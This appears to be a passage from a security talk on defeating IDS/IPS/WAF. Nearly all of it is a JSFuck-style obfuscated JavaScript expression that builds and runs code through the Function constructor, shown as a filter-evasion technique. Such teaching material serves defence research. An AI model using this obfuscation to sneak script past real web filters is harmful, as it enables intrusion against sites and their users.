(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+!![]+[])+([]+{})[!+[]+!![]]))()
Defeating IDS/IPS/WAF
Questions?